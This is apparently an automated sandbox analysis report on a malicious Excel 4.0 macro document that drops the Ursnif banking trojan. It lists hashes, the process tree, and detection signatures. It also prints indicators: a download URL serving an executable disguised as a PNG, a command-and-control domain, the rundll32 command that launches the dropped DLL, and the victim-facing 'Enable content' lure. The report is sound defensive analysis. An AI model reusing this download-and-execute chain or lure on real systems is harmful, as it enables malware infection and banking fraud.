Loading ...

Play interactive tourEdit tour

Analysis Report OCC-221220-TBU1XAT7X4.xls

Overview

General Information

Sample Name:OCC-221220-TBU1XAT7X4.xls
Analysis ID:333660
MD5:c4356a3b949b77bce8be5ecf2def64db
SHA1:e5de9340e03e98e6e0b8f6630cfd40295a6c9881
SHA256:7389677e946cac4226da9b84eca90b94b59d46cf2bf4541ea58d96d39e6669d5
Tags:goziIFSBUrsnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2360 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2556 cmdline: rundll32 ..\cnvmb.rty,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2536 cmdline: rundll32 ..\cnvmb.rty,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • iexplore.exe (PID: 1164 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 960 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
    • iexplore.exe (PID: 2456 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
OCC-221220-TBU1XAT7X4.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4e56f:$s1: Excel
  • 0x4ecea:$s1: Excel
  • 0x4ee41:$s1: Excel
  • 0x4eeaf:$s1: Excel
  • 0x4eec8:$s1: Excel
  • 0x36a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    Process Memory Space: rundll32.exe PID: 2536JoeSecurity_UrsnifYara detected UrsnifJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 ..\cnvmb.rty,DllRegisterServer, CommandLine: rundll32 ..\cnvmb.rty,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2360, ProcessCommandLine: rundll32 ..\cnvmb.rty,DllRegisterServer, ProcessId: 2556

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngAvira: detection malicious, Label: HEUR/AGEN.1138179
      Source: C:\Users\user\cnvmb.rtyAvira: detection malicious, Label: HEUR/AGEN.1138179
      Source: 4.2.rundll32.exe.1c0000.0.unpackAvira: Label: TR/Patched.Ren.Gen

      Software Vulnerabilities:

      barindex
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: ox9[1].png.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
      Source: excel.exeMemory has grown: Private usage: 4MB later: 54MB

      Networking:

      barindex
      Creates a COM Internet Explorer objectShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
      Downloads files with wrong headers with respect to MIME Content-TypeShow sources
      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Wed, 23 Dec 2020 13:48:46 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 22 Dec 2020 12:15:21 GMT ETag: "3a400-5b70c874cc840" Accept-Ranges: bytes Content-Length: 238592 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Dec 2020 13:48:46 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 22 Dec 2020 12:15:21 GMTETag: "3a400-5b70c874cc840"Accept-Ranges: bytesContent-Length: 238592Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
      Source: global trafficHTTP traffic detected: GET /ox9.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: companieshouseonlinedownload.comConnection: Keep-Alive
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: companieshouseonlinedownload.com
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.11.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: OCC-221220-TBU1XAT7X4.xls, before.2.0.0.sheet.csv_unpackString found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: https://hospader.xyz
      Source: imagestore.dat.11.drString found in binary or memory: https://hospader.xyz/favicon.ico
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp, ~DF3C5C2A9E584434E2.TMP.10.drString found in binary or memory: https://hospader.xyz/index.htm
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: https://hospader.xyz/index.htm1
      Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drString found in binary or memory: https://hospader.xyz/index.htmRoot
      Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmpString found in binary or memory: https://hospader.xyz/index.htma;
      Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drString found in binary or memory: https://hospader.xyz/index.htmndex.htm
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      E-Banking Fraud:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the ed't'ng document d2n|oaded from the 'nternet "7 0Protected View This
      Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start g) the decryption of the documen
      Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet."7 0Protected View This
      Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
      Source: Document image extraction number: 3Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
      Source: Document image extraction number: 3Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: OCC-221220-TBU1XAT7X4.xlsInitial sample: CALL
      Source: OCC-221220-TBU1XAT7X4.xlsInitial sample: EXEC
      Office process drops PE fileShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Writes registry values via WMIShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002415 NtQueryVirtualMemory,4_2_10002415
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A1757 memcpy,memcpy,lstrcatW,CreateEventA,NtQueryInformationProcess,CloseHandle,4_2_001A1757
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A4DF0 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError,4_2_001A4DF0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AAC53 RtlInitUnicodeString,NtClose,RtlNtStatusToDosError,4_2_001AAC53
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A6101 RtlNtStatusToDosError,NtClose,4_2_001A6101
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100021F44_2_100021F4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AC4904_2_001AC490
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AB8DC4_2_001AB8DC
      Source: OCC-221220-TBU1XAT7X4.xlsOLE indicator, VBA macros: true
      Source: OCC-221220-TBU1XAT7X4.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.bank.troj.expl.evad.winXLS@10/28@5/2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A3553 CoCreateInstance,4_2_001A3553
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CDDE0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Local\28835087-CD0E-3290-3D29-EA6553635A2C
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD5A6.tmpJump to behavior
      Source: OCC-221220-TBU1XAT7X4.xlsOLE indicator, Workbook stream: true
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - select * from win32_process
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
